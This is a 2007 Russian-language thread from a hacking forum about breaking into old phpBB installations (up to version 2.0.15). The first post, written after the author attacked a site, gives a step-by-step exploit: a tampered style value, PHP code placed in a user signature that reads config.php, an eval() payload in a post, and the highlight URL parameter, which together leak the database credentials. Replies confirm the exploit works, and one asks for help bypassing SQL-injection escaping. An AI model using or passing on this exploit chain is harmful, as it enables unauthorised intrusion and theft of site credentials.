HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу phpbb(highlight)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpbb(highlight)
  #1  
Старый 06.07.2007, 04:25
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


Exclamation phpbb(highlight)
Может кому пригодится .
Давно ломал сайт , там стоял старый phpbb . Через базу не смог проделать инклуд. И все остальные способы не помогли. И вот нарыл такой способ.

Идем Administration Panel --> Styles Admin --> Management --> subSilver --> Edit
Затем находим "Font Colour 3" и вместо 6цифр_цвета:
Код:
"'./*"
Далее идем в админский профайл или любой другой юзерский и в поле подписи Signature вставляем:
Код:
"$fd=fopen($phpbb_root_path.'config.php','rb');while(!feof($fd)){echo htmlspecialchars(fgets($fd));}"
Сохраняем!
После этого создаем в любом топике сообщение с текстом:
Код:
"*/var_dump(eval($user_sig)).flush().die().'"
Ну и всем известный способ --- допишем к топику &highlight=1 ---в моем случае я получил пасс и логин от базы.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось fly; 06.07.2007 в 04:27..
 
Ответить с цитированием

  #2  
Старый 06.07.2007, 10:55
NApoleonchik
Участник форума
Регистрация: 04.07.2007
Сообщений: 111
С нами: 9922725

Репутация: 102
По умолчанию
Круто. Сам испробовал - работает!
 
Ответить с цитированием

  #3  
Старый 16.07.2007, 23:49
_SploiT_
Участник форума
Регистрация: 09.05.2007
Сообщений: 120
С нами: 10003805

Репутация: 69
По умолчанию
А версию точно не помнишь?
 
Ответить с цитированием

  #4  
Старый 17.07.2007, 00:14
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию
<=2.0.15
 
Ответить с цитированием

  #5  
Старый 10.08.2007, 17:29
che_ha
Новичок
Регистрация: 08.08.2007
Сообщений: 2
С нами: 9872326

Репутация: 0
По умолчанию
Всем привет.
Я извиняюсь что не в тему , просто не хотел создавать лишний раз тему.
Нашел на phpBB MS SQL-injection.Могу провести несколько запросов где не исползуються знаки ( '," ) , всегда когда вставлю этот знак ,фильтр перед ним встявляет ( \ ),итоге Incorrect syntax near '\'.

Ничего не смог придумать , может вы знаете какие-нибудь решение ?
СПС.
 
Ответить с цитированием

  #6  
Старый 10.08.2007, 18:38
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
Читай статьи.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.